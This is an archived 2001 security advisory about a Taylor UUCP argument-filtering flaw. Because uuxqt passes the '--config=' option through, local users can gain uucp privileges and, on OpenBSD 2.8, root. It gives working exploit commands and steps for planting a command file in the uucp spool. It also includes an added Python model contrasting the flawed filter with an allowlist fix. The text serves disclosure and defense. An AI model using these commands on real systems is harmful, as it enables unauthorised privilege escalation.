Multiple vendor 'Taylor UUCP' problems.

From: zen-parse (zen-parse@gmx.net)
Date: Sat Sep 08 2001 - 12:58:39 CEST


******************* Brief description *************

  Due to incorrect argument filtering in uuxqt, a component of the
  Taylor UUCP package, it is possible for local users to gain
  uid/gid uucp.

  This may allow further elevation, depending on the system,
  up to and including root access.

  On OpenBSD 2.8 (and probably others) it allows root compromise.
  By overwriting the uucp-owned program /usr/bin/uustat, arbitrary
  commands may be executed as part of the /etc/daily crontab script,
  which runs as root.

  On Red Hat 7.0 (and probably others) it allows creation of empty
  files as root, and the ability to execute commands as if logged
  in at the console (as checked via /lib/security/pam_console.so).
  This may also allow further elevation of privileges, or denial of
  service. (Tested against uucp-1.06.1-25)

  Other systems running this package are also affected to
  a greater or lesser degree.

*********************** Solution ******************

Patches should be available very soon, if not already, for most
affected systems.

If you do not require uucp functionality, you should remove the
uucp packages from your system.

********************** The Programs ***************

uux (1) - Remote command execution over UUCP
  If you specify an alternative configuration, it will run as the user
  that called it, and pass the same configuration to uuxqt.

uuxqt (1) - UUCP execution daemon
  Defaults to allowing rmail and uucp to be run, and nothing else,
  unless the configuration it is invoked with allows it to run other
  commands.

uucp (1) - Unix to Unix copy
  If you specify an alternate configuration, it will also run as the user
  that called it.

  uuxqt checks the arguments of the programs it is asked to execute
  and removes the ones it considers dangerous, such as the short -I
  option that selects an alternative configuration file. However, it
  does not recognise the equivalent long option (--config=), which is
  passed through to the command untouched.

******************** The Exploit ******************

uux 'uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile'

will execute uucp, but will not use the /tmp/vv.v configuration file,
because uuxqt strips the -I argument before running the command.

However,

uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile'

will use the supplied configuration, without privileges being dropped:
--config= survives the filter, and uucp runs as uuxqt does, with
uid/gid uucp, rather than as the user who ran uux.
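
The following is an added example written for this page; it is not code
from Taylor UUCP or from the author of the advisory. It models the two
sides of the boundary described above: how uucp's getopt_long-style option
parser decides which configuration file to use, and the argument filter in
uuxqt, first as the advisory describes it (only the short -I form is
removed) and then as an allowlist that refuses the job instead. The option
table (flags cCdfjmnrtW, options with a value gIsux, one long option
--config) and getopt_long's acceptance of clustered flags (-cI<file>) and
unambiguous long-option prefixes (--conf=<file>) are assumptions of the
model, not facts taken from the page; the clustered and abbreviated
spellings go beyond the two command lines shown above to illustrate why a
denylist of known-bad prefixes is the wrong tool here.

```python
"""Added example (not Taylor UUCP's code): a simplified model of uuxqt's
argument filter and of uucp's option parsing for the config-file option.
The option table and getopt_long behaviours below are assumptions."""

SHORT_FLAGS = set("cCdfjmnrtW")  # assumed short options that take no value
SHORT_WITH_ARG = set("gIsux")    # assumed short options that take a value
LONG_OPTIONS = ("config",)       # assumed long options with a value; -I == --config
REFUSED = "refused"              # filter_hardened rejected the whole command line


def config_selected(args):
    """Configuration file uucp would use for `args` (the arguments after the
    program name), or None when the default system configuration is used."""
    i = 0
    while i < len(args):
        a = args[i]
        if a == "--":                      # end of options; the rest are file names
            return None
        if a.startswith("--"):
            name, sep, value = a[2:].partition("=")
            matches = [o for o in LONG_OPTIONS if name and o.startswith(name)]
            if len(matches) != 1:          # unknown or ambiguous option: uucp exits
                return None
            if sep:                        # --config=FILE, also --conf=FILE
                return value
            return args[i + 1] if i + 1 < len(args) else None   # --config FILE
        if a.startswith("-") and len(a) > 1:
            j = 1
            while j < len(a):              # walk a cluster such as -cI/tmp/x
                ch = a[j]
                if ch in SHORT_FLAGS:
                    j += 1
                    continue
                if ch not in SHORT_WITH_ARG:
                    return None            # unknown option: uucp exits
                if j + 1 < len(a):
                    value = a[j + 1:]      # -IFILE, value attached
                else:
                    i += 1                 # -I FILE, value is the next argument
                    value = args[i] if i < len(args) else None
                if ch == "I":
                    return value
                break                      # -g, -s, -u, -x consumed their value
        i += 1
    return None


def filter_original(args):
    """Filter as the advisory describes it: arguments beginning with the
    short -I option are removed, everything else is passed on unchanged,
    so --config=FILE reaches uucp intact."""
    return [a for a in args if not a.startswith("-I")]


ALLOWED_FLAGS = {"-c", "-C", "-d", "-f", "-j", "-m", "-n", "-r", "-t", "-W"}


def filter_hardened(args):
    """Allowlist filter: every argument beginning with '-' must be exactly one
    of the known-harmless flags.  Long options, abbreviated long options,
    clustered flags, -I with or without its value and a bare -- all make the
    job refused as a whole rather than being silently stripped."""
    for a in args:
        if a.startswith("-") and a not in ALLOWED_FLAGS:
            return None
    return list(args)


def run_through_uuxqt(args, filt):
    """Apply `filt` to a queued uucp command line, then let the model of uucp
    parse what survives.  Returns REFUSED, the attacker-chosen configuration
    file, or None for the default configuration."""
    kept = filt(args)
    if kept is None:
        return REFUSED
    return config_selected(kept)


# Constructed samples: the two command lines from the advisory plus spellings
# that a prefix-only check also misses under the assumed option table.
SAMPLES = {
    "short_attached":   ["-I/tmp/vv.v", "/tmp/somefile", "/tmp/someotherfile"],
    "long_equals":      ["--config=/tmp/vv.v", "/tmp/somefile", "/tmp/someotherfile"],
    "long_separate":    ["--config", "/tmp/vv.v", "/tmp/somefile", "/tmp/someotherfile"],
    "long_abbreviated": ["--conf=/tmp/vv.v", "/tmp/somefile", "/tmp/someotherfile"],
    "clustered":        ["-cI/tmp/vv.v", "/tmp/somefile", "/tmp/someotherfile"],
    "benign":           ["-c", "/tmp/somefile", "/tmp/someotherfile"],
}


def compare_filters():
    """{sample name: (result with filter_original, result with filter_hardened)}."""
    return {name: (run_through_uuxqt(a, filter_original),
                   run_through_uuxqt(a, filter_hardened))
            for name, a in SAMPLES.items()}


if __name__ == "__main__":
    for name, (orig, hard) in compare_filters().items():
        print(f"{name:18} original: {str(orig):12} hardened: {hard}")
```

Only the -I spelling is neutralised by the original filter; every other
spelling delivers the attacker's configuration file to uucp, which is why
the hardened version refuses the job on any option it does not explicitly
know rather than trying to enumerate the dangerous ones.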

1) Make a configuration file that allows any command to be executed, and
   allows files from anywhere to be copied to anywhere that is writable
   by uid/gid uucp. ( /tmp/config.uucp )
2) Make a command file with the command you want to be executed.
   ( /tmp/commands.uucp )
3) Do something like the following:

$ THISHOST=`uuname -l`
$ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337
$ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}

The commands in /tmp/commands.uucp file will be executed by uuxqt, with
the uid/gid of uucp.

If you want to perform an exploit, and don't know what to put in the
files, you should read the documentation for uucp.

(Proof of concept root exploit for OpenBSD was performed on the wargame
running OpenBSD 2.8 at damageinc.tv [ http://damageinc.tv ] )

-- zen-parse

===========================================================================
    http://mp3.com/cosv = Because %49%74%27%73%20%67%6f%6f%64%2e
     'gone platinum' = Buy the CD that %74%6f%6f%6b%20%61%67%65%73
                        = and %73%6f%75%6e%64%73%20%6f%6b
===========================================================================

-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.
If this message was posted by zen-parse@gmx.net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.



This archive was generated by hypermail 2.1.2 : Wed Sep 19 2001 - 17:53:26 CEST